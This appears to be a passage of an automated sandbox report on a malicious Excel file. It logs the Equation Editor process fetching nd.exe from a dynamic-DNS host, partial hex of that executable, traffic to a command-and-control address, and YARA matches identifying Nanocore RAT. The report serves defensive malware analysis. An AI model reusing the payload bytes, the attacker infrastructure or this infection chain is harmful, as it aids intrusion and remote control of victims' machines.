May 3, 2021 10:45:08.220868111 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:08.242319107 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:08.629679918 CEST	1133	49172	79.134.225.26	192.168.2.22
May 3, 2021 10:45:08.629913092 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:08.748908043 CEST	1133	49172	79.134.225.26	192.168.2.22
May 3, 2021 10:45:08.749113083 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:09.007003069 CEST	1133	49172	79.134.225.26	192.168.2.22
May 3, 2021 10:45:09.007169008 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:09.350879908 CEST	1133	49172	79.134.225.26	192.168.2.22
May 3, 2021 10:45:09.811223984 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:10.163882017 CEST	1133	49172	79.134.225.26	192.168.2.22
May 3, 2021 10:45:10.164108992 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:10.164978981 CEST	1133	49172	79.134.225.26	192.168.2.22
May 3, 2021 10:45:10.311687946 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:10.549951077 CEST	1133	49172	79.134.225.26	192.168.2.22
May 3, 2021 10:45:10.550138950 CEST	49172	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:14.340223074 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:17.346827030 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:17.691193104 CEST	1133	49173	79.134.225.26	192.168.2.22
May 3, 2021 10:45:17.691498995 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:17.692301989 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:18.090826988 CEST	1133	49173	79.134.225.26	192.168.2.22
May 3, 2021 10:45:18.090971947 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:18.155412912 CEST	1133	49173	79.134.225.26	192.168.2.22
May 3, 2021 10:45:18.155977011 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:18.519124985 CEST	1133	49173	79.134.225.26	192.168.2.22
May 3, 2021 10:45:19.297013998 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:19.640714884 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:19.671335936 CEST	1133	49173	79.134.225.26	192.168.2.22
May 3, 2021 10:45:19.671468973 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:19.679135084 CEST	1133	49173	79.134.225.26	192.168.2.22
May 3, 2021 10:45:19.679270029 CEST	49173	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:23.652009964 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:24.008749008 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:24.008946896 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:24.010040045 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:24.401061058 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:24.401175976 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:24.460993052 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:24.461936951 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:24.851546049 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:24.851758003 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:25.201447964 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:25.201618910 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:25.593559027 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:25.593837976 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:25.787483931 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:25.970854998 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:25.971023083 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:26.117552996 CEST	1133	49174	79.134.225.26	192.168.2.22
May 3, 2021 10:45:26.117717028 CEST	49174	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:29.798887014 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:30.170715094 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:30.170968056 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:30.171866894 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:30.574255943 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:30.574490070 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:30.611377001 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:30.826284885 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:30.959366083 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:30.959438086 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:31.340373039 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:31.340451956 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:31.731792927 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:31.731887102 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:32.043477058 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:32.133510113 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:32.133626938 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:32.252197027 CEST	1133	49175	79.134.225.26	192.168.2.22
May 3, 2021 10:45:32.252358913 CEST	49175	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:36.053801060 CEST	49176	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:36.431745052 CEST	1133	49176	79.134.225.26	192.168.2.22
May 3, 2021 10:45:36.431945086 CEST	49176	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:36.432645082 CEST	49176	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:37.412301064 CEST	1133	49176	79.134.225.26	192.168.2.22
May 3, 2021 10:45:37.412465096 CEST	49176	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:37.581721067 CEST	49176	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:38.331058979 CEST	49176	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:38.680026054 CEST	1133	49176	79.134.225.26	192.168.2.22
May 3, 2021 10:45:38.680198908 CEST	49176	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:42.341254950 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:42.733119965 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:42.733277082 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:42.751077890 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:43.166872978 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:43.166925907 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:43.222779989 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:43.222956896 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:43.571896076 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:43.572101116 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:43.666100025 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:43.666266918 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:43.942399025 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:43.942609072 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:44.114985943 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:44.115200043 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:44.530810118 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:44.633797884 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:48.076406002 CEST	1133	49177	79.134.225.26	192.168.2.22
May 3, 2021 10:45:48.076634884 CEST	49177	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:48.644224882 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:48.984333038 CEST	1133	49178	79.134.225.26	192.168.2.22
May 3, 2021 10:45:48.984513998 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:48.985173941 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:50.016033888 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:50.395934105 CEST	1133	49178	79.134.225.26	192.168.2.22
May 3, 2021 10:45:50.396059036 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:50.456625938 CEST	1133	49178	79.134.225.26	192.168.2.22
May 3, 2021 10:45:50.671264887 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:50.925920963 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:51.331166983 CEST	1133	49178	79.134.225.26	192.168.2.22
May 3, 2021 10:45:51.331388950 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:54.350960016 CEST	1133	49178	79.134.225.26	192.168.2.22
May 3, 2021 10:45:54.351218939 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:54.931777954 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:55.099944115 CEST	1133	49178	79.134.225.26	192.168.2.22
May 3, 2021 10:45:55.100063086 CEST	49178	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:55.279679060 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:55.279896021 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:55.280626059 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:55.661734104 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:55.661798000 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:55.747842073 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:55.960098982 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:56.041753054 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:56.041918993 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:56.390446901 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:56.390531063 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:56.770478964 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:56.770694017 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:57.068239927 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:57.156548023 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:57.156708002 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:45:57.353478909 CEST	1133	49179	79.134.225.26	192.168.2.22
May 3, 2021 10:45:57.353645086 CEST	49179	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:01.235908031 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:01.570983887 CEST	1133	49180	79.134.225.26	192.168.2.22
May 3, 2021 10:46:01.571271896 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:01.572521925 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:01.951000929 CEST	1133	49180	79.134.225.26	192.168.2.22
May 3, 2021 10:46:01.951175928 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:02.050965071 CEST	1133	49180	79.134.225.26	192.168.2.22
May 3, 2021 10:46:02.247560024 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:02.350763083 CEST	1133	49180	79.134.225.26	192.168.2.22
May 3, 2021 10:46:02.350871086 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:02.726039886 CEST	1133	49180	79.134.225.26	192.168.2.22
May 3, 2021 10:46:02.726317883 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:03.190872908 CEST	1133	49180	79.134.225.26	192.168.2.22
May 3, 2021 10:46:03.191050053 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:03.433814049 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:03.591115952 CEST	1133	49180	79.134.225.26	192.168.2.22
May 3, 2021 10:46:03.591212988 CEST	49180	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:07.444840908 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:07.799062967 CEST	1133	49181	79.134.225.26	192.168.2.22
May 3, 2021 10:46:07.799277067 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:07.800278902 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:08.846899986 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:09.251184940 CEST	1133	49181	79.134.225.26	192.168.2.22
May 3, 2021 10:46:09.251427889 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:09.391350031 CEST	1133	49181	79.134.225.26	192.168.2.22
May 3, 2021 10:46:09.391551018 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:09.612112999 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:09.778748035 CEST	1133	49181	79.134.225.26	192.168.2.22
May 3, 2021 10:46:09.778947115 CEST	49181	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:13.621300936 CEST	49182	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:13.973818064 CEST	1133	49182	79.134.225.26	192.168.2.22
May 3, 2021 10:46:13.974005938 CEST	49182	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:13.974353075 CEST	49182	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:14.372344017 CEST	1133	49182	79.134.225.26	192.168.2.22
May 3, 2021 10:46:14.411257029 CEST	1133	49182	79.134.225.26	192.168.2.22
May 3, 2021 10:46:14.411458015 CEST	49182	1133	192.168.2.22	79.134.225.26
May 3, 2021 10:46:14.779691935 CEST	1133	49182	79.134.225.26	192.168.2.22
May 3, 2021 10:46:14.780390978 CEST	49182	1133	192.168.2.22	79.134.225.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 10:44:28.312212944 CEST	52197	53	192.168.2.22	8.8.8.8
May 3, 2021 10:44:28.371793985 CEST	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 3, 2021 10:44:28.312212944 CEST	192.168.2.22	8.8.8.8	0xfae3	Standard query (0)	myhostisstillgood11.zapto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 3, 2021 10:44:28.371793985 CEST	8.8.8.8	192.168.2.22	0xfae3	No error (0)	myhostisstillgood11.zapto.org		172.245.45.28	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

myhostisstillgood11.zapto.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	172.245.45.28	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 10:44:28.589329004 CEST	0	OUT	GET /dashboard/docs/images/nd.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: myhostisstillgood11.zapto.org Connection: Keep-Alive
May 3, 2021 10:44:28.813957930 CEST	2	IN	HTTP/1.1 200 OK Date: Mon, 03 May 2021 08:44:28 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 Last-Modified: Mon, 03 May 2021 07:22:11 GMT ETag: "116c00-5c167d1eb0284" Accept-Ranges: bytes Content-Length: 1141760 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a3 a4 8f 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 58 11 00 00 12 00 00 00 00 00 00 92 77 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 77 11 00 4f 00 00 00 00 80 11 00 d0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 57 11 00 00 20 00 00 00 58 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0e 00 00 00 80 11 00 00 10 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 6a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 77 11 00 00 00 00 00 48 00 00 00 02 00 05 00 04 84 00 00 3c 99 00 00 03 00 00 00 01 00 00 06 40 1d 01 00 00 5a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 60 01 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 34 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 35 00 00 0a 6f 36 00 00 0a 73 37 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`PXw @ @@wO H.textW X `.rsrcZ@@.relocj@BtwH<@Z0( (!(o"(#($(%(&('N(o`((&()ss+s,s-s.0~o/+0~o0+0~o1+0~o2+0~o3+0<~(4,!rp(5o6s7~+0~
May 3, 2021 10:44:28.813988924 CEST	3	IN	Data Raw: 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 2b 00 00 70 7e 07 00 00 04 6f 38 00 00 0a 28 39 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 Data Ascii: +"0&(r+p~o8(9t%+0&(r9p~o8(9t%+s(:ts;(9(<0(o=,(o>*0e~,M~(
May 3, 2021 10:44:28.814012051 CEST	4	IN	Data Raw: 00 0a 13 0a 11 0a 2c 05 11 06 0d 2b 09 06 11 06 6f 57 00 00 0a 00 00 11 05 17 d6 13 05 11 05 11 04 8e 69 fe 04 13 0b 11 0b 3a 59 ff ff ff 07 28 4c 00 00 0a 16 fe 01 13 0c 11 0c 2c 0f 04 07 28 2c 00 00 06 16 28 30 01 00 06 52 00 00 08 28 4c 00 00 Data Ascii: ,+oWi:Y(L,(,(0R(L,(,(0R(L,(,(4ToXrAp(YQ08oSn%=oRi,oS+~Z+0Q{
May 3, 2021 10:44:28.814033985 CEST	6	IN	Data Raw: 0a 00 00 00 07 0a 2b 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 0c 00 00 11 00 7e 12 00 00 04 7e 11 00 00 04 02 6f 7a 00 00 0a 6f 7b 00 00 0a 0a 2b 00 06 2a 00 13 30 03 00 1b 00 00 00 0c 00 00 11 00 7e 11 00 00 04 7e 12 00 00 04 02 6f 7a 00 00 0a Data Ascii: +0~~ozo{+0~~ozo{+0c{,L,E{,{o\|}{,{o}}}FoB(~*0,1~
May 3, 2021 10:44:29.015441895 CEST	7	IN	Data Raw: 10 00 00 00 00 01 00 22 23 00 08 3b 00 00 01 13 30 05 00 10 00 00 00 2a 00 00 11 00 02 17 03 04 05 28 60 00 00 06 0a 2b 00 06 2a 13 30 04 00 0f 00 00 00 2a 00 00 11 00 02 03 14 14 28 61 00 00 06 0a 2b 00 06 2a 00 1b 30 04 00 32 00 00 00 2b 00 00 Data Ascii: "#;0(`+0(a+02+(?(=o(9('(;0&(c+0&(d+*0,s(Too3
May 3, 2021 10:44:29.015480995 CEST	9	IN	Data Raw: 13 05 38 f3 00 00 00 11 05 6f 99 00 00 0a 00 07 6f 72 01 00 06 6f 9a 00 00 0a 6f 9b 00 00 0a 13 08 2b 70 12 08 28 9c 00 00 0a 13 09 03 03 11 09 6f a2 00 00 0a 6f a3 00 00 0a d0 6c 00 00 01 28 35 00 00 0a fe 01 13 0a 11 0a 2c 21 11 05 11 09 02 03 Data Ascii: 8ooroo+p(ool(5,!o(9(Do+%o(9(O(9o(-oo,+o>o,o>o
May 3, 2021 10:44:29.015503883 CEST	10	IN	Data Raw: 04 11 04 2c 34 08 d0 6c 00 00 01 28 35 00 00 0a fe 01 13 05 11 05 2c 09 7e 5a 00 00 0a 0b 00 2b 0d 00 28 03 00 00 2b 8c 0d 00 00 1b 0b 00 02 09 12 01 28 7c 00 00 06 26 00 00 09 6f a6 00 00 0a 00 14 0d 07 28 04 00 00 2b 0a 2b 00 06 2a 00 13 30 05 Data Ascii: ,4l(5,~Z+(+(\|&o(++04(++04(++0(}+0h5P,rapsMz,rpsMzo-o+,
May 3, 2021 10:44:29.015531063 CEST	11	IN	Data Raw: 6f b9 00 00 0a 16 fe 01 13 06 11 06 2c 1b 08 11 05 6f ba 00 00 0a 26 09 02 11 05 6f 34 00 00 06 6f ba 00 00 0a 26 00 2b 2e 00 08 72 b9 02 00 70 11 05 28 bb 00 00 0a 6f ba 00 00 0a 26 09 72 b9 02 00 70 02 11 05 6f 34 00 00 06 28 bb 00 00 0a 6f ba Data Ascii: o,o&o4o&+.rp(o&rpo4(o&oo4oWooW(r:loo,o+,oprEp(sMz(Trsp%op%o%
May 3, 2021 10:44:29.015551090 CEST	13	IN	Data Raw: 00 00 0a 0b 16 0c 2b 4d 07 08 9a 74 45 00 00 01 0d 09 75 14 00 00 02 14 fe 03 13 04 11 04 2c 2f 09 74 14 00 00 02 13 05 11 05 6f 0d 01 00 06 28 4c 00 00 0a 13 06 11 06 2c 0f 11 05 02 6f c2 00 00 0a 6f 0e 01 00 06 00 00 00 11 05 0a 2b 3f 00 00 08 Data Ascii: +MtEu,/to(L,oo+?i-s%oo%o%o%o+*0?o-'o-o-o-l(5+,8s(o
May 3, 2021 10:44:29.015572071 CEST	14	IN	Data Raw: 00 07 6f 72 01 00 06 11 09 11 0a 28 39 00 00 0a 72 31 01 00 70 28 31 01 00 06 6f 9e 00 00 0a 00 2b 5d 00 07 6f 72 01 00 06 11 09 11 0a 28 39 00 00 0a 16 28 2f 01 00 06 8c 80 00 00 01 6f 9e 00 00 0a 00 2b 3a 00 07 6f 72 01 00 06 11 09 11 0a 28 39 Data Ascii: or(9r1p(1o+]or(9(/o+:or(9rp(.o+or(9o+otoo,o+9,i+,2o-o(+,ovoW
May 3, 2021 10:44:29.015593052 CEST	15	IN	Data Raw: 05 00 70 28 bc 00 00 0a 28 3f 00 00 06 0c 08 18 6f b7 00 00 0a 0d 09 04 05 28 92 00 00 06 13 04 09 6f a6 00 00 0a 00 14 0d 11 04 0a de 0c 00 08 2c 07 08 6f 19 00 00 0a 00 dc 06 2a 00 00 00 01 10 00 00 02 00 6f 00 20 8f 00 0c 00 00 00 00 13 30 02 Data Ascii: p((?o(o,oo 0[EsQo+=o(ToU(-(+,oW1+0aF,i+,+J(ToUi+)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2984 Parent PID: 584

General

Start time:	10:43:33
Start date:	03/05/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f090000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2280 Parent PID: 584

General

Start time:	10:43:55
Start date:	03/05/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2636 Parent PID: 2280

General

Start time:	10:43:59
Start date:	03/05/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xb20000
File size:	1141760 bytes
MD5 hash:	042AA11C6D49E1CCA5923F02D1B0A5AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: RegSvcs.exe PID: 2360 Parent PID: 2636

General

Start time:	10:44:02
Start date:	03/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
